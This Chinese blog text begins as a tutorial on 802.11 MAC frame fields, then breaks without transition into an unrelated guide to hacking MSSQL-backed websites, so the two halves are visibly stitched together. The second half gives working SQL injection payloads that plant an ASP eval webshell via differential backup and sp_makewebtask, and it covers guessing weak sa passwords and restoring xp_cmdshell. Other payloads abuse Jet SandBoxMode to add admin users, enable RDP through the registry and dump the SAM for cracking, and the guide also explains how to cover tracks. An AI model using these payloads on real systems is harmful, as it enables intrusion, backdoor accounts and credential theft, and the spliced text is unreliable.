作者：__ay 

在上一篇中，简要概述了无线网络的通信机制，那么在下来就得开始介绍一下无线网络的通信细节了。说到这里，以后所说的内容会有《802.11 无线网络权威指南 第二版影印版》这本书内容的影子，还有内容中会加上通过wireshark抓包的分析以及IEEE关于wlan 80211协议的说明文档。虽然说这本书虽然讲得好，但是很多数据包细节上的问题还是需要我们亲手去做实验去验证的，一向认为学习不能仅仅看书，亲手去验证一些你认为疑惑的地方可能会比做几道课后题的效果要好得多得多 ^_^

1 MAC802.11数据帧格式

首先要说明的是mac802.11的帧格式很特别，它与TCP/IP这一类协议不同，它的长度是可变的。不同功能的数据帧长度会不一样。这一特性说明mac802.11数据帧显得更加灵活，然而，也会更加复杂。mac 802.11的数据帧长度不定主要是由于以下几点决定的

1.1 mac地址数目不定，根据帧类型不同，mac 802.11的mac地址数会不一样。比如说 ACK帧仅有一个mac地址，而数据帧有3个mac地址，在WDS模式（下面要提到）下，帧头竟然有4个mac地址。

1.2 802.11的管理帧所携带的信息长度不定，在管理帧中，不仅仅只有一些类似于mac地址，分片标志之类的这些信息，而且另外还会包括一些其它的信息，这些信息有关于安全设置的，有关于物理通信的，比如说我们的SSID名称就是通过管理帧获得的。AP会根据不同的情况发送包含有不同信息的管理帧。管理帧的细节问题我们会在后面的文章中讨论，这里暂时跳过。

1.3 加密（wep,wpa等）信息，QOS（quality of service）信息，若有加密的数据帧格式和没有加密的数据帧格式还不一样，加密数据帧格式还多了个加密头，用于解密用。然则QOS也是同样道理。

竟然mac 802.11数据帧那么复杂，我们就先从通用的格式开始说吧

帧控制(2 bytes)：

用于指示数据帧的类型，是否分片等等信息，说白了，这个字段就是记录了mac 802.11的属性。

    *Protocol version：表明版本类型，现在所有帧里面这个字段都是0x00

    *Type：指明数据帧类型，是管理帧，数据帧还是控制帧

    *Subtype：指明数据帧的子类型，因为就算是控制帧，控制帧还分RTS帧，CTS帧，ACK帧等等，通过这个域判断出该数据帧的具体类型

    *To DS/From DS：这两个数据帧表明数据包的发送方向，分四种可能情况讨论

        **若数据包To DS为0，From DS为0，表明该数据包在网络主机间传输

        **若数据包To DS为0，From DS为1，表明该数据帧来自AP

        **若数据包To DS为1，From DS为0，表明该数据帧发送往AP

        **若数据包To DS为1，From DS为1，表明该数据帧是从AP发送自AP的，也就是说这个是个WDS(Wireless Distribution System)数据帧，至于什么是WDS，可以参考下这里的介绍 #传送门

    *Moreflag：分片标志，若数据帧被分片了，那么这个标志为1，否则为0

    *Retry：表明是否是重发的帧，若是为1，不是为0

    *PowerManage：当网络主机处于省电模式时，该标志为1，否则为0.

    *Moredata：当AP缓存了处于省电模式下的网络主机的数据包时，AP给该省电模式下的网络主机的数据帧中该位为1，否则为0

    *Wep：加密标志，若为1表示数据内容加密，否则为0

    *Order 这个表示用于PCF模式下，这里不予讨论

生存周期/Associate ID (2 bytes):

先前不是讲过虚拟载波监听的一个机制么，他的Network Allocation Vector（NAV）就存在这里，这里叫duration，即生存周期。当然不是所有时候这个字段存放的NAV值。在特定类型数据帧中，它也可能表示Associate ID。一旦有主机关联到AP了，AP都会为主机分配一个Associate ID。比如在网络主机通知AP自己要进入省电模式（power saving）的时候，网络主机发给AP的通知数据帧里面，这个域就表示的是Associate ID而不是NAV了。当然还可以通过最高位来判断这个域的含义：

    *在15bit为0的时候，该域表示duration

    *在15bit为1，14bit为1的时候，表示Associate ID。

序列控制(2 bytes：4 bits/12 bits)：这个域分2部分，一个是分片序列号和标识帧列号。分片序列号就是记录分片序号的。比如一个帧A被分片成a1，a2，a3，那么a1，a2，a3这三个分片帧的分片序列分别是0,1,2。这个和IP分段原理一样的，该域占4个比特位。剩下的12个比特位就用于标识帧的序号，这个跟IP头里面的序列号一样。

MAC地址 1-4 

这四个地址在不同帧中有不同含义。这些以后会讨论。

以后我们可能会碰到以下类型的mac地址

RA(receiver address)：无线网络中，该数据帧的接收者

TA(transmitter address)：无线网络中，该数据帧的发送者

BSSID(Basic Service Set ID)：在infrastructure BBS中，BSSID就是AP的mac地址。但是在IBBS中，它是一个随机即生成的46位二进制序列，还有最高两位分别是Universal/Local标志位和Individual/Group标志位。IBBS的BSSID中，Universal/Local标志位为1，表示本地MAC，Individual/Group标志位为0，表示是个人MAC。也就是说在IBBS中，BSSID地址应该类如 10xxxxxx-xxxxxxxx-xxxxxxxx-xxxxxxxx-xxxxxxxx-xxxxxxxx（x表示随机数要么0要么1, 2进制表示）

DA(destine address)：该帧的目的mac地址

SA(source address)：该帧的源mac地址

这里的DA和SA含义和普通以太网中的含义一样，在无线网络中可能我们需要通过AP把数据发送到其它网络内的某台主机中。但是有的人会奇怪，直接在RA中填这台主机的mac地址不就久好了么。但是请注意RA的含义，说的是无线网络中的接收者，不是网络中的接收者，也就是说这台目的主机不再无线网络范围内。在这种情况下我们的RA只是一个中转，所以需要多出一个DA字段来指明该帧的最终目的地，当然，如果有了DA那必须有SA，因为若目的主机要回应的话，SA字段是必不可少的。(假设没有SA字段，那么目的主机回应的数据包就只能发送到源主机所属的AP上了~)

最典型的一个例子就是在WDS模式下，数据帧会有4个地址，RA，TA表示接收端和发送端，这两个地址用于无线传输的时候。还有2个地址是DA和SA，分别跟以太网中一样表示源地址和目的地址。WDS帧的格式如下图：

打个比方说，AP1有主机A，AP2有主机B。如果A要和B同学，那么A会首先发送数据帧给AP1，然后AP1发送帧给AP2 。这个时候帧里面会有4个地址，分别是RA=mac(AP2)，TA=mac(AP1)，DA=mac(B)，SA=mac(A)。

    关于差异备分我想已经臭名远洋了吧。下面我们先来简单说下数据库的差异备分：

     差异备份所基于的常规数据库备份、部分备份或文件备份称为差异的“基准”或“差异基准”。仅复制备份不能用作差异基准。文件差异备份的基准备份可以包含在完整备份、文件备份或部分备份中。有关详细信息，请参阅在 简 单模式下的备分或在完整模式下的备分 。

差异备份只记录自上次建立差异基准后更改的数据。差异备份比差异基准更小且更快，便于执行频繁备份，从而降低了数据丢失的风险。

    除只读数据库之外，其他数据库中每个文件的差异基准信息均保存在主文件组的一个目录中。每个数据库的差异基准信息亦存储在 master 数据库中。

————以上是引用MSDN对差异备分的解释

    所谓的差异备分，就是只备分最近一次备分之后到此次备分之前所增加的那一部分数据。打个比方我第N次备分后数据库存放的内容是ABCD，然后我第N+1次 备分的时候使用差异备分，此时数据库的存放的内容是ABCDEFG。那么我差异备分的结果就是EFG，只备分增加量。都明白了我们就开始讲点有用的东西 啦，嘿嘿~~为什么要用差异备分呢？因为规模点的网站数据库一般有几十M甚至，那么你备分出来的数据就有几十M，然后你从WEB上打开个几十M内容文件的 话……估计要很久吧。这么入侵的话我觉得你还是直接拿刀找网管让他把后台密码给你好了。再者我们备分的一句话木马会受到影响，如果数据库中存在《或者%之 类的字符的话。可能导致我们小马无法访问。还有就是备分那么大的数据库可能会导致脚本操作超时，所以我们得尽量减少我们备分出来的数据库的大小。为什么备 分数据库就可以入侵网站了呢……我们往下跳

我不是分割线

________________________________________________________

      我们来介绍下SQL的备分语句：

BACKUP DATABASE ****（表示你要备分的数据库名） TO DISK='*****'（表示你要备分的数据库路径） WITH DIFFERENTIAL（告诉数据库你要进行差异备分，如果没有WITH DIFFERENTIAL则进行完整备分）

      举个例子，比如我们知道了WEB服务器的物理路径 D:\WEB\,服务器的数据库名为XXX

那么如果我们将一个一句话木马插入数据库中（后面讲到）然后备分数据库，具体语句如下

BACKUP DATABASE XXX TO DISK='D:\WEB\AY.ASP' WITH DIFFERENTIAL

      注意到D:\WEB\AY.ASP没有，意思就是说把数据库备分到WEB目录下而且数据库备分文件名为AY.ASP，可喜的是  AY.ASP这个文件中存在我们的一句话木马语句，当服务器遇到ASP后缀名的文件时会对该文件进行ASP解析，ASP解析的原则是遇到<%开始解 析，%>结束解析。比如我们向数据库中插入一句话木马，这个时候我们插入的数据是新增的数据，然后用差异备分备分一个ASP文件到WEB目录下。那 么这个ASP文件下就会存在我们的木马内容了。然后访问一句话木马，然后小马传大马。

      别告诉我不知道怎么访问，因为很多人还是不理解WEB物理路径和我们访问的URL之间的关系。简单说下好了，比如你的WEB根目录在这样D:\WEB\， 文件夹下有你想访问的文件AY.ASP。网站域名为http:\\xxx.xxx.xxx，那么你只要访问http:\\xxx.xxx.xxx \AY.ASP就可以了。你的WEBSHELL就到手了，入侵服务器的进度就完成了10%（为什么是10%呢？因为90%的难度在提权~呵呵）。

原理知道没？接下来是实践了，往下看之前建议你把SQL的基本语句搞懂。

来，再往下跳

我还是不是分割线

____________________________________________________________________________

      首先我们需要注入的数据库类型是MSSQL的，而且这个数据库的连接权限必须是DB_OWNER的权限。（一般MSSQL数据库网站都是这个权限的）有建表的权限。满足以上条件的网站其实是比较多的。呵呵……

URL;create table ay(ay1 image) --

新建一个名为AY的表 表内存在名为AY1的图象类型的字段

URL;backup database 数据库名 to disk='物理路径' with DIFFERENTIAL -- 

注意，这次备分是要减小数据库的备分量
URL;insert into ay (ay1) values (“一句话木马") --

向你新建的表中插入一句话木马内容
URL;backup database 数据库名 to disk='物理路径'with DIFFERENTIAL -- 

备分数据库到WEB目录下

URL;drop table xy --

删除表名，清理痕迹

      步骤介绍完了，也许大家还是有疑惑，就是为什么第2句要备分一下，比如还是上面的例子，我们备分之前数据库存在内容为ABCD，我们进行差异备分，然后插 入小马，那么数据库内容表为ABCDE，E代表小马内容。那么差异备分出来内容为E。为什么这样呢，因为你不知道这台服务器多久之前备分过的，万一这服务 器没备分过而且数据库内容有几百M呢？所以严谨点的办法就是先备分一次在写入一句话木马。

      首先讲下什么是1433弱口令漏洞，所谓弱口令就是指很简单的一些密码随便猜就能猜出来的，比如说密码是123，123456，admin甚至用户名密码 相同等等之类的状况，我们就能轻易获得对方的密码。呵呵，许多人都很懒，所以密码都很简单，包括我也是，呵呵……（而且还经常那123当临时密码）。在说 下什么是1433弱口令，1433所指的是1个服务端口，什么服务呢？那就是传说中的MSSQL啦，试想MSSQL安装之初的默认密码是空，然而又存在许 多懒网管，那么我们只要拿个工具简单的扫下在检测下密码……嘿嘿……可想而之扫到1433弱口令的几率还是蛮大的~呵呵

    接下来我们说说拿到SA权限的1433弱口令我们能干什么，大家都知道XP_CMDSHELL这个扩展储存吧，这个扩展储存可以看做是MSSQL提供给管 理者执行CMD命令的一个功能模块，通过这个我们可以执行CMD命令而更可喜的是SA权限的帐户一般都是以SYSTEM权限启动的，权限相当于计算机管理 员权限，那么我们相当于可以用CMD命令的形式控制你要入侵的计算机了，当然我们肯定不会满足于用CMD控制机器，我们的目标是通过3389或者其他的软 件来达到控制计算机的目的。下面我们来分类讨论各种情况下的切入点，仅供参考……

以下假设你拿到了SA权限若口令的机器。有专门的SQL查询分析器可以连接对方.大家有兴趣可以去下一个来看看.

1.当3389终端开启的时候，而目标机子也没做类似IP这样的过滤，那么我们就直接执行CMD命令加个用户，然后用加的用户登上去就OK了~呵呵

（需要无敌RP啊~~~）

2.那么如果CMD命令可以执行,但是没开3389,我们先扫下目标IP,看他有没有开80端口,有的话90%是有 WEB服务的,那么我们是SA权限直接丢个小马上去,嘿嘿.........有了马我们可以上传东西啦~~传个开3389的工具上去执行,机器重启下就可 以登3389了.

以下是SA权限下备分小马的语句;

exec sp_makewebtask '备分路径',' select ''一句话木马'' ';--

例子如下

http:\\xx.x.x.x.asp?id=1;exec sp_makewebtask 'd:\wwwroot\ay.asp',' select ''<%25eval (request('#'))25%>'' ';--

        其实1433弱口令跟注入非常相似,比如你1433上有WEB服务你也可以用查询语句把用户名和密码找出来进后台传马.思路是非常多的,但是看你怎么使用了.

      MSSQL的功能非常强大,所以几乎没有它办不到的事(扩展储存没删除情况下~而且SA权限没被降为USERS用户启动).但是但是万一人家把CMD给你 删除了,恢复也恢复不了的时候又该怎么办呢?如果我们没有CMDSHELL,又没开3389,那么SA权限看起来就象是鸡肋~

      关于在SQL连接器上查看目录的方式

exec xp_dirtree '(目录名,比如c:\)',1,1

      执行后就会返回目标机器指定目录下的文件夹和文件,那么通过这个你就可以列目录了

      这个扩展储存的说明在注入语句集合里面有,这里就略过

exec xp_regread/exec xp_regwrite 注册表操作的扩展储存

      下面引用啊D注入语句里面的例子

写注册表
exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1

读注册表
exec master..xp_regread 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon','Userinit'

     如果CMDSHELL用不了的时候,我们来试着恢复下CMD

    exec master.dbo.sp_addextendedproc 'xp_cmdshell','xplog70.dll'

    然后执行CMD命令,如果还是不行的话,唉~~那没办法了,呵呵,一会讲到,呵呵~~~继续往下看吧~

     来,我们来提一下传说中的沙盒模式提权,

不是分割线

--------------------------------------------------------------------------------------------------------------------------------

     首先我在<Jet引擎可以调用VBA的shell()函数>(http://support.microsoft.com/kb /q239104/)这份资料知道在accessl里可以直接进行sql查询,具体的在Access中测试.测试的SQL语句如下:

SELECT shell('c:\windows\system32\cmd.exe /c net user ray 123 /ad');

查看计算机管理的本地用户,马上发现多出一个ray用户,说明语句成功执行了.接下来写一个VBS脚本任意连接一个mdb来测试这个SQL语句

Set Conn=Createobject("Adodb.Connection")

Conn.Open "Provider=Microsoft.Jet.OLEDB.4.0;Data Source=test.mdb"

Set Rs=Conn.execute("Select Shell(""cmd.exe /c net user ray 123 /ad"")")
Msgbox Rs(0)

运行后会出现"表达式中的'Shell'函数未 定义"的错误,<Jet引擎可以调用VBA的 shell()函数>提到WINDOWS在Jet引擎中设置了一个名为SandBoxMode的开关,它的注册表位置在 HKEY_LOCAL_MACHINE\SoftWare\Microsoft\Jet\4.0\Engine\SandBoxMode里,0为在任何所 有者中中都禁止起用安全设置,1为仅在允许的范围之内,2则是必须是Access的模式下,3则是完全开启安全设置.默认情况下为2,只能在Access 的模式下调用VBA的shell()函数,我们尝试将此注册表值改为0,结果成功的运行了VBS利用Jet引擎可以调用VBA的shell()函数执行了 系统命令.

通常一台MSSQL服务器同时支持Access数据库,所以只要有一个sa或者dbowner的连接,就满足了修改注册表的条件,因为MSSQL有一个名为xp_regwrite的扩展,它的作用是修改注册表的值.语法如下

exec maseter.dbo.xp_regwrite Root_Key,SubKey,Value_Type,Value

如果存在一个sa或者dbowner的连接的SQL注入点,就可以构造出如下注入语句

InjectionURL;EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SoftWare\Microsoft\Jet\4.0\Engine','SandBoxMode','REG_DWORD','0'--

那我们将SandBoxMode开关的注册表值修改为0就成功 了.接着连接到一个Access数据库中,就可以执行系统命令,当然执行系统命令我们只需要一个Access数据库相关Select的注入点或者直接用 ASP文件Select调用这个VBA的 shell()函数,但是实际上MSSQL有一个的OpenRowSet函数,它的作用是打开一个特殊的数据库或者连接到另一个数据库之中.当我们有一个 SA权限连接的时候,就可以做到打开Jet引擎连接到一个Access数据库,同时我们搜索系统文件会发现windows系统目录下本身就存在两个 Access数据库,位置在%windir%\system32\ias\ias.mdb或者%windir%\system32\ias\ dnary.mdb,这样一来我们又可以利用OpenRowSet函数构造出如下注入语句:
InjectionURL';Select * From OpenRowSet('Microsoft.Jet.OLEDB.4.0',';Database=c:\winnt\system32\ias\ias.mdb','select shell("net user ray 123 /ad")');--

如果你觉得不大好懂的话，我可以给你做一个简化的理解：
1，Access可以调用VBS的函数，以System权限执行任意命令
2，Access执行这个命令是有条件的，需要一个开关被打开
3，这个开关在注册表里
4，SA是有权限写注册表的
5，用SA写注册表的权限打开那个开关
6，调用Access里的执行命令方法，以system权限执行任意命令

------------------------------------------------------------------------------------------

不是分割线

      看完了吧~辛苦了~呵呵,呵呵,直接把原文贴出来了,我好懒啊我~原理就是上面说的那个

      CMD不是删除了么?嘿嘿~我们用刚刚讲的方法来执行,具体如下

首先执行

exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.\Engines','SandBoxMode','REG_DWORD',1

呵呵~把注册表改了~

不放心的话我们来读读看~

exec master..xp_regread 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.\Engines','SandBoxMode'

如果返回的值是1的话证明命令成功了

那么我们就可以用SYSTEM函数来执行命令了 下面给出执行命令语句

select * from openrowset('microsoft.jet.oledb.4.0',';database=c:\windows\system32\ias\ias.mdb','select shell("cmd.exe /c query user >c:\windows\11.txt")');

红色字体的是我执行的命令,>c:\windows \11.txt的意思是把回显命令导入到windows的文件夹下的1.txt,一会要用到的.黑色字体是我们数据库的路径,特别需要注意的是如果是 windows2000 那么灰色部分就应该是c:\winnt\system32\ias\ias.mdb 

如果是windows2003的话就是c:\windows\system32\ias\ias.mdb

后边也是一样情况 win2003是windows目录而2000是winnt目录

执行命令的时候是不是心里面很没底呢?而且有些命令比如NETSTAT之类的是需要查看回显的,那么怎么才能得到回显呢~~~嘿嘿~~无疑MSSQL肯定为我们提供了读取文件内容的功能操作

那么我们就来看看怎么操作的吧~~呵呵

操作如下
select * from openrowset('microsoft.jet.oledb.4.0','text;database=c:\windows\','select * from 11.txt')

灰色部分是文件所在目录,而红色是文件名

比如我想读D:\WWW\XXX\目录下的A.ASP文件,那么语句如下

select * from openrowset('microsoft.jet.oledb.4.0','text;database=D:\WWW\XXX\','select * from A.ASP')

还记得我刚刚把命令回显导出的步骤吗?我们就用上面这个操作来读取TXT内容就可以得到我们的CMD执行命令回显了,很好玩吧~呵呵  

这就是我饶过CMDSHELL来执行命令的一点心得,呵呵  我们接下来说说3389的问题

一些关于3389终端的信息:

      其实在HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp下的PortNumber键值 和

      HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp下的PortNumber键值

记录着3389的端口号 如果想改连接端口号的话直接用xp_regwrite修改对应的键值就OK了~呵呵

      那么接下来说说最关键的问题,在注册表下存在一个决定3389开启与否的键值,键值位置如下:

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server下的fDenyTSConnections

其值是0表示开启 1表示关闭,我们直接用XP_REGWRITE把值修改就好了~~

语句如下

exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\CurrentControlSet\Control\Terminal Server','fDenyTSConnections','REG_DWORD',0

你们不放心可以用XP_REGREAD确认

具体语句不写了,大家现学现卖吧,呵呵~~

好了,最后说过我没实践过的思路,理论上可行吧,呵呵

当你的沙盒模式也不能用的时候那么,嘿嘿   ^-^

我们起码还是能从目标机器上拿点什么东西的嘛,比如说SAM啊~呵呵

首先用OPENROWSET这个函数把SAM的内容暴出来

然后复制内容,本地新建个SAM把复制的内容导进去,保存,相当与把目标机子的SAM给下下来,然后暴吧~~把管理员的密码暴出来,接着用XP_REGWRITE把3389端口开了就好了

其实开3389的时候还会遇到很多情况,由于我没实践,所以没什么好说的了,如果大家以后遇到什么这方面的问题可以拿来一起讨论,嘿嘿

至于怎么破SAM,OPENROWSET的函数用法之类的就不说了~去百度一下吧~~